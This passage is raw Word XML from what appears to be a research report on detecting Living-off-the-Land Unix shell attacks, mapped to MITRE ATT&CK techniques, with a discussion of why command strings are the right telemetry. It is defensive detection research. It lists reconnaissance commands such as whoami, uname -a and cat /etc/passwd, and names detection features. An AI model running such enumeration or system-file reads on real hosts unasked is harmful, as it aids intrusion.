            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> are also everyday benign tools (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tldr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), so the provenance label conflates "download cradle" with "contains a URL/IP." The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IPv4-presence-only shortcut probe scored ROC-AUC 0.535 (Dataset 1) / 0.523 (Dataset 2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — a weak-but-real artifact the model can lean on. Because the honeypot's real-IP dropper style does not resemble curated benign data, this cue is register-specific and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>does not transfer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (it is a prime contributor to the D2→D1 collapse).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1033 — System Owner/User Discovery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (whoami/id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Bare enumeration with no distinctive syntax: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id -u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; and adjacent recon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uname -a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cat /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, `last \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hostname`. A single legitimate binary, often argument-free.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie): the first stage of nearly every botnet script is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> fingerprinting; and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> enumeration pages. Provenance stamps these "attack" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>only because of where they were captured</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, not what they are.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_enum_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_sensitive_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>NO — not reliably.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> These commands are byte-for-byte identical to routine administration, so there is no content signal to learn. A provenance classifier can only "detect" them by memorizing that they co-occur with a malicious source's </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — i.e. label contamination, not intent. Forensics bear this out: the most-confident false negatives are exactly this recon class (`last \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pkaction --verbose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>declare historywords</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), and the same </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">id` sitting in a real user's history would be a false positive. This is the clearest case where provenance labeling </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cannot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> yield reliable detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Takeaway.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detectability under provenance labels tracks how much the technique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lexically distinguishes itself from benign administration</w:t>
      </w:r>
      <w:r>
        <w:t>, not how dangerous it is. T1059.004 reverse shells carry their own unforgeable syntax and are caught perfectly; T1105 hides a real signal behind a URL/IP artifact that is genuine in-domain but non-transferable; T1033 discovery has no content signature at all and is "detected" only as a source-style artifact. A detector that reports high aggregate accuracy is therefore strong on the first class, brittle on the second, and effectively blind on the third — a distinction aggregate F1 hides but per-technique mapping makes explicit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1.1 — Deep-Dive Threat Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Scope (WORK_DIVISION.md): Noam writes 1.1 and four mapping rows; Ben</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>contributes three rows (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch1_telemetry_rows_ben.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>) and the detectability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">argument in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch1_threat_mapping.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>. Numbers cited here are live, from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_feature_decisions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch3_feature_audit.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK catalogues **T1059.004 — Command and Scripting Interpreter: Unix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shell** under the Execution tactic (TA0002). It covers adversary use of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and their relatives to run commands on a compromised host. It is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not an exotic capability: the shell is the standard administrative interface to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>every Unix-family system, which is precisely what makes its abuse difficult to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>separate from its use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The technique is the execution primitive that the rest of an intrusion is built</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on. An adversary who has achieved command injection through any initial-access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>route — a web application flaw, a stolen SSH credential, an exposed service —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>converts that foothold into arbitrary execution through the shell, and then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>chains onward: ingress tool transfer (T1105), discovery (T1033, T1083),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>credential access (T1552.001), persistence, lateral movement. Detection at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shell layer is therefore leverage: it sits at the narrow waist that most</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>subsequent behaviour must pass through.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Why "living off the land" defeats file-based detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The defining property of a Living-off-the-Land attack is that **no attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>binary is introduced**. At the OS layer, execution proceeds through the ordinary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fork(2)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>execve(2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> path against a binary that is already on the host:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/usr/bin/curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/usr/bin/awk</w:t>
      </w:r>
      <w:r>
        <w:t>. That binary arrived through the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>distribution's package manager, matches its vendor hash, sits at its expected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>path with its expected permissions, and — where signature enforcement exists —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is signed. From the kernel's point of view nothing anomalous has occurred.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This dismantles the file-centric detection stack by construction, not by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>evasion. Hash blocklists have no novel hash to match. Static scanners and YARA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rules have no dropped file to inspect. Application allow-listing by path or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>publisher passes the binary because it genuinely is the legitimate binary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity monitoring reports no change, because nothing changed. Each of these</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">controls answers the question </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>is this program trustworthy?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — and for a LotL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attack the honest answer is yes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>What differs between the attacker's invocation and the administrator's is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the program but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the instruction given to it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fetching a release</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tarball and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> streaming a dropper into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are the same executable, the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>same syscalls, the same file on disk; they differ only in argv. Detection must</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>therefore move from the binary to the command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Why the command string is the right telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The command string is the finest-grained artefact that still carries intent. It</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">is also routinely available: Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> records full argv in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>type=EXECVE</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sysmon-for-Linux Event ID 1 carries the command line, shell history files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>capture interactive sessions, and Cowrie honeypots log attacker input verbatim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cowrie.command.input</w:t>
      </w:r>
      <w:r>
        <w:t>. No new agent or kernel module is required, and the</w:t>
      </w:r>
